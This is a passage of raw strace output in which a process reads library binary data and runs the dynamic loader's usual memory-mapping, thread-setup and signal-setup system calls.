\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

12685 07:43:37.767537 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

12685 07:43:37.767555 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d74000

12685 07:43:37.767567 mmap2(0xb7d7d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d7d000

12685 07:43:37.767583 mmap2(0xb7d7f000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d7f000

12685 07:43:37.767596 close(1)          = 0

12685 07:43:37.767620 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d73000

12685 07:43:37.767633 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d738c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12685 07:43:37.767690 mprotect(0xb7eef000, 4096, PROT_READ) = 0

12685 07:43:37.767715 munmap(0xb7f37000, 29913) = 0

12685 07:43:37.767728 set_tid_address(0xb7d73908) = 12685

12685 07:43:37.767737 set_robust_list(0xb7d73910, 0xc) = 0

12685 07:43:37.767746 futex(0xbfbdf880, 0x81 /* FUTEX_??? */, 1) = 0

12685 07:43:37.767761 rt_sigaction(SIGRTMIN, {0xb7ef92c0, [], SA_SIGINFO}, NULL, 8) = 0

12685 07:43:37.767773 rt_sigaction(SIGRT_1, {0xb7ef9340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

12685 07:43:37.767785 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

